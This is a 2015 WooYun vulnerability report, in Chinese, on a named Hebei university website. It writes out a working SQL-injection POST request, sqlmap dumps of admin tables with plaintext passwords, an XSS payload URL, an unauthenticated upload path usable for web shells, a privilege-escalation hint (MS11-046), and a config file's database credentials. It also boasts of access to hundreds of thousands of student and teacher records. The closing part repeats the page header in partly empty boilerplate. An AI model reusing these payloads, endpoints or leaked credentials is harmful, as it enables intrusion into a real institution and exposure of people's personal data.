河北某大学SQL注入+XSS(已入后台Shell) | wooyun-2015-0121290| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121290

漏洞标题：河北某大学SQL注入+XSS(已入后台Shell)

漏洞作者：路人甲

提交时间：2015-06-18 16:29

修复时间：2015-06-23 16:30

公开时间：2015-06-23 16:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-18：细节已通知厂商并且等待厂商处理中
2015-06-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

注入
XSS（反射存储）
上传
泄漏大量教师、学生、四六级等个人信息几十万数据库信息

详细说明：

0x01 SQL注入漏洞
POST 注入，在这个漏洞上就能把数量统计出来啦

POST /jpk/loginyanzheng.aspx HTTP/1.1
Content-Length: 217
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDAAADQARS=FDEBKICDDLBKGHMGNDAMANDG; ASP.NET_SessionId=g502e555fed4jo555ldmrgyf; cookiesname=fbscjyga
Host: jpk.heuet.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
submit=%e7%99%bb%20%20%e5%bd%95&p=a&u=1

sqlmap 截图

available databases [10]:
[*] DGSX
[*] English
[*] JWC
[*] master
[*] model
[*] msdb
[*] Teacher
[*] tempdb
[*] yishu
[*] zcyl

几个密码表

Database: English
Table: admin
[7 entries]
+----+-------+-------+--------+----------+-----------+
| id | popem | state | module | password | adminname |
+----+-------+-------+--------+----------+-----------+
| 1  | 1     | 1     | 超级管理   | 123456   | admin     |
| 6  | 0     | 1     | 交流园地   | 123456   | chat      |
| 5  | 0     | 1     | 考试指南   | 123456   | exam      |
| 7  | 0     | 1     | 相关链接   | 123456   | link      |
| 4  | 0     | 1     | 写作自测   | 123456   | test      |
| 3  | 0     | 1     | 理论技巧   | 123456   | theory    |
| 2  | 0     | 1     | 写作资源   | 123456   | write     |
+----+-------+-------+--------+----------+-----------+
Database: JWC
Table: admin
[17 entries]
+----+--------------+-------+----------+----------+
| id | smallclassid | popem | username | password |
+----+--------------+-------+----------+----------+
| 10 | 9            | 0     | sysgl    | 87656716 |
| 10 | 9            | 0     | sysgl    | 87656716 |
| 11 | 3            | 0     | szk      | 87655665 |
| 12 | 6            | 0     | xsk      | 87655613 |
| 13 | 7            | 0     | xxzx     | 87655970 |
| 2  | 11           | 0     | gjyjs    | 7326042  |
| 33 | 5            | 0     | jck      | 87655842 |
| 43 | 10           | 0     | dmtjsgl  | 87326025 |
| 43 | 10           | 0     | dmtjsgl  | 87326025 |
| 46 | 22           | 0     | jxszlt   | jxszlt   |
| 47 | 24           | 0     | bgxz     | 87655654 |
| 48 | 25           | 0     | syzx     | 87656338 |
| 5  | 18           | 0     | jsglk    | 87326025 |
| 6  | 1            | 0     | jwcbgs   | 87655649 |
| 7  | 2            | 0     | jwk      | 87655654 |
| 8  | 8            | 0     | jxjck    | 87655875 |
| 9  | 4            | 0     | jxk      | 737678   |
+----+--------------+-------+----------+----------+

统计下，目前连接的裤子有多少条记录
艺术类几十万

Database: yishu
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.KSBMK                                        | 284090  |
| dbo.KSYSK                                        | 60761   |
| dbo.YXMCK                                        | 2428    |
| dbo.YXZYK                                        | 1776    |
| dbo.xuexiaozy                                    | 74      |
| dbo.CJK                                          | 29      |
+--------------------------------------------------+---------+

教师的数据有几万

Database: Teacher
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.T教学                                            | 27863   |
| dbo.V教学                                            | 27863   |
| dbo.SZJX                                         | 7450    |
| dbo.T帐号                                            | 1189    |
| dbo.V帐号                                            | 1101    |
| dbo.szjb                                         | 1097    |
| dbo.T教师                                            | 1060    |
| dbo.V教师                                            | 1060    |
| dbo.TRP教学学年                                          | 477     |
| dbo.VRP教学学年                                          | 477     |
| dbo.TRP教学自然年                                          | 295     |
| dbo.VRP教学自然年                                          | 295     |
| dbo.T进修                                            | 100     |
| dbo.V进修                                            | 100     |
| dbo.T院部                                            | 99      |
| dbo.V院部                                            | 99      |
| dbo.T教师调出                                            | 52      |
| dbo.V教师调出                                            | 52      |
| dbo.T配置                                            | 47      |
| dbo.T教师退休                                            | 36      |
| dbo.V教师退休                                            | 36      |
| dbo.T汇总                                            | 6       |
| dbo.V汇总通表                                            | 6       |
| dbo.T权限                                            | 5       |
+--------------------------------------------------+---------+

0x02 XSS
http://jpk.heuet.edu.cn/nmh/yymj.asp?categoryID=1'%22()%26%25<woo><ScRiPt%20>alert(1)</ScRiPt>&page=2

0x03 上传漏洞

http://jpk.heuet.edu.cn/jpk/gxxz/lb_upload.aspx

以游客身份登录即可

没有任何限制，上传ASPX asp PHP 都能解析，

http://jpk.heuet.edu.cn/jpk/gxxz/lb_selectFile.aspx

里面的信息随便下载审核即可，当然也可以提权MS11-046这个补丁没有打，可以创建高管。请自行删除。
敏感数据

<connectionStrings>
    <add name="constr" connectionString="Data Source=JWC\SQLEXPRESS;database=zcyl;Integrated Security=SSPI;uid=wangjunchao;password=wangjunchao12302;Connect Timeout=30;"/>
    <add name="OA_DBConnectionString" connectionString="Data Source=JWC\SQLEXPRESS;database=zcyl;Integrated Security=SSPI;uid=wangjunchao;password=wangjunchao12302;"/>
    <add name="OA_DBConnectionString1" connectionString="Data Source=JWC\SQLEXPRESS;database=zcyl;Integrated Security=SSPI;uid=wangjunchao;password=wangjunchao12302;"/>

看一下server上面打包的数据库有哪些 113MB的数据库文件

四六级的数据就多了，感觉数学都不好使啦，28.6MB的access 的数据库

photo里面的个人信息一个表中也就五万条

其他的mdf ldf 可以附加在SQL2005 记得权限哦
teacher.mdf

zcyl.mdf

漏洞证明：

修复方案：

修改源代码
防注入防上传

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-06-23 16:30

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121290

漏洞标题：河北某大学SQL注入+XSS(已入后台Shell)

相关厂商：CCERT教育网应急响应组

漏洞作者：路人甲

提交时间：2015-06-18 16:29

修复时间：2015-06-23 16:30

公开时间：2015-06-23 16:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121290

漏洞标题：河北某大学SQL注入+XSS(已入后台Shell)

相关厂商：CCERT教育网应急响应组

漏洞作者： 路人甲

提交时间：2015-06-18 16:29

修复时间：2015-06-23 16:30

公开时间：2015-06-23 16:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0121290"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云